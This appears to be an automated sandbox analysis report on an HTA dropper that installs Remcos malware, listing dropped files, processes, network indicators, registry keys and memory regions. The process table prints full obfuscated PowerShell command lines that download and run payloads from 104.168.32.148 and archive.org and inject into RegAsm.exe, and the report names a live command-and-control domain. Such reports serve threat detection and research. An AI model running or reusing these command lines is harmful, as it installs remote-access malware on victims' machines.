Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
LJ1IZDkHyE.hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nicemeetingsofpictureclearthingstobe[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES9FA0.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Sep 25 18:26:38 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3avg21oj.lby.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avhm3mxt.kyo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwcckyoy.geo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jglgku3t.ix2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jshrsksj.riy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2e2crop.3g1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooaobhj5.cfc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qu2krlml.ehe.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
|
modified
|
There are 9 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass
-nOp -w 1 -C
DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
PoWerSHELl -Ex bYPass -nOp
-w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe
; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content
'+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content
= '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y =
[Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od
= gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA
, CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$')
| . ( $eNV:COmspEc[4,26,25]-jOiN'')"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp"
"c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIF
|
104.168.32.148
|
||
http://104.168.32.148/345/CHPPZA.txt
|
104.168.32.148
|
||
ramcxx.duckdns.org
|
|||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://104.168.32.148/345/niceme
|
unknown
|
||
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://ia600100.us.archivL
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://www.microsoft.
|
unknown
|
||
http://104.168.32.148
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://geoplugin.net/json.gp
|
unknown
|
||
http://104.168.32.148/
|
unknown
|
||
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
http://crl.micro
|
unknown
|
||
http://geoplugin.net/json.gp/C
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFL
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://ia600100.us.archive.org
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://ia600100.us.archive.org
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ramcxx.duckdns.org
|
45.134.140.70
|
||
ia600100.us.archive.org
|
207.241.227.240
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
104.168.32.148
|
unknown
|
United States
|
||
45.134.140.70
|
ramcxx.duckdns.org
|
Georgia
|
||
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-M3P7YT
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-M3P7YT
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-M3P7YT
|
time
|
There are 11 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
60CF000
|
trusted library allocation
|
page read and write
|
||
5F8B000
|
trusted library allocation
|
page read and write
|
||
DBB000
|
heap
|
page read and write
|
||
8730000
|
trusted library section
|
page read and write
|
||
28DE000
|
stack
|
page read and write
|
||
6395000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
5489000
|
heap
|
page read and write
|
||
794B000
|
heap
|
page read and write
|
||
4C60000
|
trusted library allocation
|
page read and write
|
||
523F000
|
trusted library allocation
|
page read and write
|
||
F5C000
|
stack
|
page read and write
|
||
5FD2000
|
heap
|
page read and write
|
||
6599000
|
heap
|
page read and write
|
||
53AF000
|
trusted library allocation
|
page read and write
|
||
78DE000
|
stack
|
page read and write
|
||
54DE000
|
heap
|
page read and write
|
||
2DE3000
|
heap
|
page read and write
|
||
4BD7000
|
heap
|
page read and write
|
||
3520000
|
trusted library allocation
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
76CE000
|
stack
|
page read and write
|
||
5493000
|
heap
|
page read and write
|
||
37A0000
|
heap
|
page read and write
|
||
4FE0000
|
heap
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
593F000
|
trusted library allocation
|
page read and write
|
||
79B0000
|
trusted library allocation
|
page read and write
|
||
2B1D000
|
stack
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page read and write
|
||
745E000
|
stack
|
page read and write
|
||
72CD000
|
stack
|
page read and write
|
||
7A01000
|
heap
|
page read and write
|
||
8760000
|
trusted library allocation
|
page read and write
|
||
722F000
|
stack
|
page read and write
|
||
519A000
|
trusted library allocation
|
page read and write
|
||
728B000
|
stack
|
page read and write
|
||
602C000
|
trusted library allocation
|
page read and write
|
||
5060000
|
heap
|
page read and write
|
||
3500000
|
trusted library allocation
|
page read and write
|
||
54EE000
|
heap
|
page read and write
|
||
7DBD000
|
stack
|
page read and write
|
||
749F000
|
stack
|
page read and write
|
||
508F000
|
heap
|
page read and write
|
||
65C4000
|
heap
|
page read and write
|
||
549E000
|
stack
|
page read and write
|
||
FAE000
|
stack
|
page read and write
|
||
798D000
|
heap
|
page read and write
|
||
2B73000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
8960000
|
trusted library allocation
|
page execute and read and write
|
||
34F3000
|
trusted library allocation
|
page execute and read and write
|
||
9195000
|
trusted library allocation
|
page read and write
|
||
51E0000
|
heap
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
504E000
|
stack
|
page read and write
|
||
6210000
|
trusted library allocation
|
page read and write
|
||
7127000
|
trusted library allocation
|
page read and write
|
||
65B3000
|
heap
|
page read and write
|
||
5F99000
|
heap
|
page read and write
|
||
7980000
|
trusted library allocation
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
4F83000
|
trusted library allocation
|
page read and write
|
||
5468000
|
heap
|
page read and write
|
||
65B3000
|
heap
|
page read and write
|
||
65F6000
|
heap
|
page read and write
|
||
5FC2000
|
heap
|
page read and write
|
||
759A000
|
stack
|
page read and write
|
||
531F000
|
trusted library allocation
|
page read and write
|
||
6585000
|
heap
|
page read and write
|
||
65C4000
|
heap
|
page read and write
|
||
5260000
|
heap
|
page read and write
|
||
658F000
|
heap
|
page read and write
|
||
547E000
|
heap
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
65D1000
|
heap
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
549F000
|
heap
|
page read and write
|
||
5083000
|
heap
|
page read and write
|
||
31CE000
|
stack
|
page read and write
|
||
506C000
|
heap
|
page read and write
|
||
4F15000
|
heap
|
page read and write
|
||
8A40000
|
heap
|
page read and write
|
||
2E13000
|
heap
|
page read and write
|
||
5F99000
|
heap
|
page read and write
|
||
693E000
|
stack
|
page read and write
|
||
347E000
|
stack
|
page read and write
|
||
717E000
|
stack
|
page read and write
|
||
65DF000
|
heap
|
page read and write
|
||
5F2D000
|
heap
|
page read and write
|
||
5208000
|
trusted library allocation
|
page read and write
|
||
5452000
|
trusted library allocation
|
page read and write
|
||
2C39000
|
heap
|
page read and write
|
||
509C000
|
heap
|
page read and write
|
||
653B000
|
heap
|
page read and write
|
||
5189000
|
trusted library allocation
|
page read and write
|
||
5508000
|
trusted library allocation
|
page read and write
|
||
F42000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
3522000
|
trusted library allocation
|
page read and write
|
||
5FC3000
|
heap
|
page read and write
|
||
2BC3000
|
heap
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
2E1D000
|
heap
|
page read and write
|
||
50D6000
|
heap
|
page read and write
|
||
2D0C000
|
heap
|
page read and write
|
||
726E000
|
stack
|
page read and write
|
||
50CA000
|
heap
|
page read and write
|
||
65EA000
|
heap
|
page read and write
|
||
50D9000
|
heap
|
page read and write
|
||
5FE2000
|
heap
|
page read and write
|
||
E8D000
|
heap
|
page read and write
|
||
4C92000
|
trusted library allocation
|
page read and write
|
||
65EC000
|
heap
|
page read and write
|
||
7D40000
|
trusted library allocation
|
page read and write
|
||
36E0000
|
trusted library allocation
|
page read and write
|
||
71AE000
|
stack
|
page read and write
|
||
2BA5000
|
heap
|
page read and write
|
||
5178000
|
trusted library allocation
|
page read and write
|
||
73FE000
|
stack
|
page read and write
|
||
5100000
|
heap
|
page read and write
|
||
54BF000
|
heap
|
page read and write
|
||
31D0000
|
heap
|
page read and write
|
||
65E6000
|
heap
|
page read and write
|
||
6599000
|
heap
|
page read and write
|
||
7991000
|
heap
|
page read and write
|
||
7080000
|
heap
|
page execute and read and write
|
||
2D08000
|
heap
|
page read and write
|
||
5088000
|
heap
|
page read and write
|
||
4D00000
|
heap
|
page read and write
|
||
4AF0000
|
trusted library allocation
|
page read and write
|
||
30DD000
|
heap
|
page read and write
|
||
65B3000
|
heap
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
7C2E000
|
stack
|
page read and write
|
||
75DE000
|
stack
|
page read and write
|
||
5F2F000
|
heap
|
page read and write
|
||
3170000
|
trusted library allocation
|
page read and write
|
||
F98000
|
stack
|
page read and write
|
||
2BCC000
|
heap
|
page read and write
|
||
54E4000
|
heap
|
page read and write
|
||
5063000
|
heap
|
page read and write
|
||
6599000
|
heap
|
page read and write
|
||
5214000
|
heap
|
page read and write
|
||
653D000
|
heap
|
page read and write
|
||
6578000
|
heap
|
page read and write
|
||
2B7A000
|
heap
|
page read and write
|
||
65BC000
|
heap
|
page read and write
|
||
34F0000
|
trusted library allocation
|
page read and write
|
||
7C21000
|
heap
|
page read and write
|
||
653B000
|
heap
|
page read and write
|
||
575E000
|
stack
|
page read and write
|
||
7580000
|
heap
|
page read and write
|
||
850E000
|
stack
|
page read and write
|
||
2BC3000
|
heap
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
4D40000
|
heap
|
page readonly
|
||
5F93000
|
heap
|
page read and write
|
||
2C37000
|
heap
|
page read and write
|
||
65F6000
|
heap
|
page read and write
|
||
65D8000
|
heap
|
page read and write
|
||
52AE000
|
trusted library allocation
|
page read and write
|
||
65D6000
|
heap
|
page read and write
|
||
788E000
|
stack
|
page read and write
|
||
2BA5000
|
heap
|
page read and write
|
||
3187000
|
heap
|
page read and write
|
||
4BAE000
|
stack
|
page read and write
|
||
2B2E000
|
stack
|
page read and write
|
||
3184000
|
trusted library allocation
|
page read and write
|
||
2D9B000
|
heap
|
page read and write
|
||
64C9000
|
heap
|
page read and write
|
||
2D23000
|
heap
|
page read and write
|
||
4B4E000
|
stack
|
page read and write
|
||
506D000
|
heap
|
page read and write
|
||
4FE1000
|
heap
|
page read and write
|
||
600D000
|
heap
|
page read and write
|
||
771B000
|
stack
|
page read and write
|
||
2D00000
|
heap
|
page read and write
|
||
2B50000
|
heap
|
page read and write
|
||
2C32000
|
heap
|
page read and write
|
||
259A000
|
stack
|
page read and write
|
||
3750000
|
trusted library allocation
|
page read and write
|
||
31D6000
|
heap
|
page read and write
|
||
5FB0000
|
heap
|
page read and write
|
||
2DF5000
|
heap
|
page read and write
|
||
6622000
|
heap
|
page read and write
|
||
AFC000
|
stack
|
page read and write
|
||
5ABE000
|
stack
|
page read and write
|
||
6217000
|
trusted library allocation
|
page read and write
|
||
89D0000
|
trusted library allocation
|
page read and write
|
||
653B000
|
heap
|
page read and write
|
||
78F0000
|
heap
|
page read and write
|
||
65B6000
|
heap
|
page read and write
|
||
7BBF000
|
heap
|
page read and write
|
||
50E2000
|
heap
|
page read and write
|
||
75C0000
|
heap
|
page read and write
|
||
501D000
|
heap
|
page read and write
|
||
799F000
|
heap
|
page read and write
|
||
2DFD000
|
heap
|
page read and write
|
||
2C7D000
|
stack
|
page read and write
|
||
79E0000
|
trusted library allocation
|
page read and write
|
||
373C000
|
stack
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
16DE000
|
stack
|
page read and write
|
||
2C34000
|
heap
|
page read and write
|
||
4E30000
|
heap
|
page read and write
|
||
102C000
|
stack
|
page read and write
|
||
8C50000
|
trusted library allocation
|
page execute and read and write
|
||
2DFA000
|
heap
|
page read and write
|
||
65B6000
|
heap
|
page read and write
|
||
7A20000
|
trusted library allocation
|
page read and write
|
||
6599000
|
heap
|
page read and write
|
||
549A000
|
heap
|
page read and write
|
||
5CFD000
|
stack
|
page read and write
|
||
710B000
|
stack
|
page read and write
|
||
5167000
|
heap
|
page read and write
|
||
8520000
|
trusted library allocation
|
page execute and read and write
|
||
7120000
|
direct allocation
|
page read and write
|
||
76D1000
|
heap
|
page read and write
|
||
35B5000
|
heap
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
5196000
|
trusted library allocation
|
page read and write
|
||
6002000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
5F93000
|
heap
|
page read and write
|
||
343E000
|
stack
|
page read and write
|
||
65D2000
|
heap
|
page read and write
|
||
7C6D000
|
stack
|
page read and write
|
||
54ED000
|
heap
|
page read and write
|
||
2DF9000
|
heap
|
page read and write
|
||
65B6000
|
heap
|
page read and write
|
||
3525000
|
trusted library allocation
|
page execute and read and write
|
||
581E000
|
stack
|
page read and write
|
||
6A3F000
|
stack
|
page read and write
|
||
6451000
|
trusted library allocation
|
page read and write
|
||
28F7000
|
stack
|
page read and write
|
||
2D7A000
|
heap
|
page read and write
|
